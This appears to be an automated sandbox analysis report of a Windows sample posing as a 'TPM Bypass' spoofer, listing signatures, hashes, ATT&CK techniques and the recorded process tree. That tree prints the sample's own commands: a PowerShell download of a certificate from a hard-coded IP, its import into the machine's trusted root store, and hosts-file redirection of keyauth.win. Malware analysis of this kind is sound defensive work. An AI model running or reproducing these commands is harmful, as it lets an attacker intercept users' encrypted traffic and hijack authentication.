9f0930c6ccac8f9a6a58b056ce2cfa25da6a4c61ce6bdb31d80b963e911e0adf

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
11-06-2024 11:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CipherWare Spoofer 04-29/TPM Bypass.exe
Size

5.4MB
MD5

226b0aaa3a81ae166681f1b3c41209f5
SHA1

1e932f41b49428704d2e1ee5cec08a4e61c7d094
SHA256

2c4bd49d86851a375e3669ee361e1a786d59765eb7dbaeeddc62f5cb18f1c66d
SHA512

290ec6a64f3166e516cdcdde28bb99644902598378a18b867e496e0fb821d6597e202d179653353a4da97c1a94f67fed4340e914306a837be85162c0b023a013
SSDEEP

98304:ZXbIrqkTdrVLNdMJ6Hz7OFBZqSn+m6mB5CxFwHXDty:9IBTdrhMJ6Hz0kSn+WKuHXDty

Score

9^/10

evasion execution trojan

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TPM.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2184	powershell.exe
2688	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TPM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TPM.exe

Executes dropped EXE 2 IoCs

pid	Process
2408	TPM.exe
1120	Process not Found

Loads dropped DLL 1 IoCs

pid	Process
2076	TPM Bypass.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	TPM.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2408	TPM.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
284	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2184	powershell.exe
2688	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2184	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe

Suspicious use of FindShellTrayWindow 10 IoCs

pid	Process
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe

Suspicious use of SendNotifyMessage 10 IoCs

pid	Process
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe
2076	TPM Bypass.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 2076 wrote to memory of 2492	2076	TPM Bypass.exe	28
PID 2076 wrote to memory of 2492	2076	TPM Bypass.exe	28
PID 2076 wrote to memory of 2492	2076	TPM Bypass.exe	28
PID 2492 wrote to memory of 2976	2492	cmd.exe	30
PID 2492 wrote to memory of 2976	2492	cmd.exe	30
PID 2492 wrote to memory of 2976	2492	cmd.exe	30
PID 2976 wrote to memory of 3028	2976	cmd.exe	31
PID 2976 wrote to memory of 3028	2976	cmd.exe	31
PID 2976 wrote to memory of 3028	2976	cmd.exe	31
PID 2976 wrote to memory of 2500	2976	cmd.exe	32
PID 2976 wrote to memory of 2500	2976	cmd.exe	32
PID 2976 wrote to memory of 2500	2976	cmd.exe	32
PID 2976 wrote to memory of 2184	2976	cmd.exe	33
PID 2976 wrote to memory of 2184	2976	cmd.exe	33
PID 2976 wrote to memory of 2184	2976	cmd.exe	33
PID 2976 wrote to memory of 2688	2976	cmd.exe	34
PID 2976 wrote to memory of 2688	2976	cmd.exe	34
PID 2976 wrote to memory of 2688	2976	cmd.exe	34
PID 2976 wrote to memory of 2708	2976	cmd.exe	35
PID 2976 wrote to memory of 2708	2976	cmd.exe	35
PID 2976 wrote to memory of 2708	2976	cmd.exe	35
PID 2708 wrote to memory of 2744	2708	cmd.exe	36
PID 2708 wrote to memory of 2744	2708	cmd.exe	36
PID 2708 wrote to memory of 2744	2708	cmd.exe	36
PID 2708 wrote to memory of 2428	2708	cmd.exe	37
PID 2708 wrote to memory of 2428	2708	cmd.exe	37
PID 2708 wrote to memory of 2428	2708	cmd.exe	37
PID 2976 wrote to memory of 2448	2976	cmd.exe	38
PID 2976 wrote to memory of 2448	2976	cmd.exe	38
PID 2976 wrote to memory of 2448	2976	cmd.exe	38
PID 2976 wrote to memory of 284	2976	cmd.exe	39
PID 2976 wrote to memory of 284	2976	cmd.exe	39
PID 2976 wrote to memory of 284	2976	cmd.exe	39
PID 2076 wrote to memory of 2408	2076	TPM Bypass.exe	40
PID 2076 wrote to memory of 2408	2076	TPM Bypass.exe	40
PID 2076 wrote to memory of 2408	2076	TPM Bypass.exe	40

C:\Users\Admin\AppData\Local\Temp\CipherWare Spoofer 04-29\TPM Bypass.exe
"C:\Users\Admin\AppData\Local\Temp\CipherWare Spoofer 04-29\TPM Bypass.exe"
1⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c @echo off & echo Running checklmao.bat silently... & start "" /min /b cmd /c "C:\Users\Admin\AppData\Local\Temp\checklmao.bat & exit"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2492
- - C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\checklmao.bat & exit"
    3⤵
    - Drops file in Drivers directory
    - Suspicious use of WriteProcessMemory
    PID:2976
  - - C:\Windows\system32\certutil.exe
      certutil -store TrustedRoot
      4⤵
      PID:3028
  - - C:\Windows\system32\findstr.exe
      findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
      4⤵
      PID:2500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Invoke-WebRequest -Uri http://188.227.107.14/server.crt -OutFile 'C:\Users\Admin\AppData\Local\Temp\server.crt'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Import-Certificate -FilePath 'C:\Users\Admin\AppData\Local\Temp\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -store TrustedRoot | findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2708
    - - C:\Windows\system32\certutil.exe
        
        certutil -store TrustedRoot
        5⤵
        
        PID:2744
    - - C:\Windows\system32\findstr.exe
        
        findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
        5⤵
        
        PID:2428
  - - C:\Windows\system32\findstr.exe
      findstr /C:"188.227.107.14 keyauth.win" "C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:2448
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /flushdns
      4⤵
      Gathers network information
      PID:284
- C:\Users\Admin\AppData\Local\Temp\TPM.exe
  C:\Users\Admin\AppData\Local\Temp\TPM.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TPM.exe

Filesize
4.2MB

MD5
8009d43544d3fe4c26599bbcae17e03b

SHA1
ecf1ce31a4d3eb813b5f273dbd073e4f89119448

SHA256
abdb3a70dcddb612078fedefe10b3fa53ec63a89776136c5863637e35b512a1b

SHA512
66e9505197289a4719634a612056bf588af5d81edc4f83259d241d7a0951ba6ca5a4d8466e9755e870fb052df029b93391bf411cec3c8b1aff52c8c4751010ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\checklmao.bat

Filesize
1KB

MD5
65b71554b34e595a0088bf996fffddfb

SHA1
902cec988a26f29a46fc25ab54ba9537b2f08af3

SHA256
38947d774f734828c5aaf1a58d4ca187ccd36bb5390b570b65c5bf4102d074ff

SHA512
35c5983f2cf47b981343e0a4dddd6ce880c3a3d555da8c9fe02133dd99ba007b85c49ace2d2694c2cc7f1dd0e6d0a5dfce8a12e681719858f4ac621e1be04905

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a23f9cc982cbea1b2261ea1e5ae40def

SHA1
3110d24df3fa2a0cba40f78d568127054dee5465

SHA256
b32e15932554548a8a3647eed0c1c876ea26d26f6e4adf07da356b28add8bc2c

SHA512
893d7cc0c4316e1f2cd961da210520eab311b080390fefe9a44581d21dbeb06d263dafda32fb442b7e1044b9078f8006401694ac71c62fc2332f401989b61f46

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
1007B

MD5
fa30fe7d3e958884a8b79b94ea7b6e58

SHA1
f48bb772d42f7ca8e59d6bc603f186fe36cac550

SHA256
e257f23fb8ea40ae0c06d11eeec87ed01a6d76b530632843378d1c1a1e878b49

SHA512
52bcc1f25829cf2fb94a9776d0c734eefc81deb91cd60dac2f04d327a01b1485d758f42741de0fe5dda82fe2bf136dc3b68512a22670766f454535da004161da

Download Submit
memory/2076-32-0x0000000140000000-0x0000000140B94000-memory.dmp

Filesize
11.6MB

Download
memory/2184-16-0x000000001B470000-0x000000001B752000-memory.dmp

Filesize
2.9MB

Download
memory/2184-17-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/2408-33-0x0000000140000000-0x0000000140B94000-memory.dmp

Filesize
11.6MB

Download
memory/2408-37-0x0000000140000000-0x0000000140B94000-memory.dmp

Filesize
11.6MB

Download
memory/2408-36-0x0000000140000000-0x0000000140B94000-memory.dmp

Filesize
11.6MB

Download
memory/2408-35-0x0000000140000000-0x0000000140B94000-memory.dmp

Filesize
11.6MB

Download
memory/2408-39-0x0000000140000000-0x0000000140B94000-memory.dmp

Filesize
11.6MB

Download
memory/2688-24-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2688-23-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download